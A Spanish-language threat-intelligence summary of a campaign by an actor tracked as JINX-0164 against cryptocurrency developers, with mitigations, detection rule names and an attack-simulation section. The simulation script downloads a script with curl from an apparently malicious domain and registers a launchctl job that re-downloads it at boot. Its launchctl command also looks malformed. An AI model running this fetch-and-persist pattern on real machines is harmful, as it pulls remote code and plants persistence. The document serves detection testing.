Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un actor de amenazas motivado financieramente, rastreado como JINX-0164, está apuntando a desarrolladores de criptomonedas a través de ingeniería social en LinkedIn, malware para macOS y compromiso de CI/CD. El grupo despliega un RAT personalizado en Python conocido como AUDIOFIX y un backdoor basado en Go llamado MINIRAT, ambos configurados para comunicarse con dominios de comando y control codificados. Después de obtener acceso, los atacantes roban credenciales de nubes y desarrollo, alteran repositorios de código e incluso publican paquetes npm maliciosos para expandir el acceso y habilitar el robo de criptomonedas. La campaña refleja una sofisticada amenaza de la cadena de suministro dirigida al ciclo de vida del desarrollo de software.
Investigación
Wiz CIRT siguió la intrusión desde el contacto inicial en LinkedIn hasta la entrega del enlace malicioso, la ejecución de payloads para macOS, el robo de credenciales y el movimiento lateral en repositorios de código fuente. Su investigación descubrió scripts droppers, persistencia mediante launchctl, y el uso de la herramienta nord-stream para la exfiltración de secretos. Los investigadores también identificaron múltiples dominios falsificados, nodos de salida de VPN y un compromiso de la cadena de suministro que involucra el paquete npm @velora-dex/sdk . Se recopilaron rutas de archivos, hashes, dominios y direcciones IP para apoyar la detección y caza de amenazas.
Mitigación
Las defensas recomendadas incluyen monitorear sistemas macOS para launchctl persistencia, detectar LaunchAgents sospechosos y bloquear los dominios maliciosos conocidos y servidores de comando y control. Las organizaciones deben imponer commits firmados, habilitar el Modo Vigilante de GitHub y vigilar por commits no verificados o cambios inusuales en los flujos de trabajo de CI/CD. El uso de VPN debe limitarse a proveedores aprobados, y se debe requerir MFA para cuentas en la nube y plataformas de desarrollo.
Respuesta
Si se detecta esta actividad, aísle inmediatamente el sistema macOS afectado, recolecte artefactos forenses y revoque cualquier credencial comprometida y tokens de API. Los equipos de seguridad deben realizar una revisión completa de los repositorios de código en busca de commits maliciosos y eliminar cualquier paquete npm comprometido. Se deben bloquear los dominios de comando y control identificados y actualizar las reglas de firewall para denegar tráfico a las direcciones IP maliciosas. Se debe notificar a las partes interesadas relevantes y considerar el intercambio de inteligencia sobre amenazas con socios confiables de la industria.
Flujo de Ataque
Todavía estamos actualizando esta parte. Regístrese para recibir notificaciones
NotificarmeDetecciones
Descarga de Archivo Sospechoso Directo a IP (a través de proxy)
Ver
Intento de Comunicación de Búsqueda de Dominio IP Posible (a través de dns)
Ver
Intento de Ejecución de Launchctl de MacOS (a través de cmdline)
Ver
Posible Ejecución mediante Uso de chmod y nohup en Comando Único (a través de cmdline)
Ver
Posible Manipulación de Cadenas Codificadas en Base64 [MacOS] (a través de cmdline)
Ver
Intento de Ejecución de Curl Sospechoso [MacOS] (a través de cmdline)
Ver
IOCs (HashSha256) para detectar: Comprometer el Commit: Un Nuevo Actor de Amenazas Apuntando a la Infraestructura de Desarrollo de Software de la Industria de Criptomonedas
Ver
IOCs (SourceIP) para detectar: Comprometer el Commit: Un Nuevo Actor de Amenazas Apuntando a la Infraestructura de Desarrollo de Software de la Industria de Criptomonedas
Ver
IOCs (DestinationIP) para detectar: Comprometer el Commit: Un Nuevo Actor de Amenazas Apuntando a la Infraestructura de Desarrollo de Software de la Industria de Criptomonedas
Ver
Detección de Persistencia de Malware AUDIOFIX y Descarga de Payload [Creación de Proceso en Linux]
Ver
Ejecución de Simulación
Requisito previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa y Comandos de Ataque:
- Acceso inicial: Un atacante envía un correo electrónico de phishing que contiene un enlace malicioso (T1566.004). La víctima hace clic en el enlace, que apunta a
https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh. - Descarga de payload: El terminal de la víctima ejecuta un
comando curlque recupera silenciosamente el script. - Configuración de persistencia: El script registra un agente de lanzamiento usando
launchctl submit, incrustando el mismocomando curlcomando para que el payload se vuelva a descargar en cada arranque (T1546.006). - Ejecución: El agente de lanzamiento se ejecuta con privilegios de sistema, ejecutando el script descargado para comprometer el host.
- Acceso inicial: Un atacante envía un correo electrónico de phishing que contiene un enlace malicioso (T1566.004). La víctima hace clic en el enlace, que apunta a
-
Script de Prueba de Regresión: (ejecutar en una máquina macOS de prueba; requiere derechos de administrador)
#!/bin/bash set -euo pipefail # 1. Simular la descarga maliciosa con curl (sin código malicioso real) MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh" curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh # 2. Registrar un agente de lanzamiento que vuelva a descargar el script al iniciar launchctl submit -l com.malicious.audiofix -p /usr/bin/curl -a -c -t "30" /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh echo "Agente de lanzamiento malicioso registrado. Comprueba SIEM para detección." -
Comandos de Limpieza:
# Eliminar el agente de lanzamiento launchctl remove com.malicious.audiofix || true # Eliminar el script descargado rm -f /tmp/audio-fix.sh echo "Limpieza completa."
Fin del Informe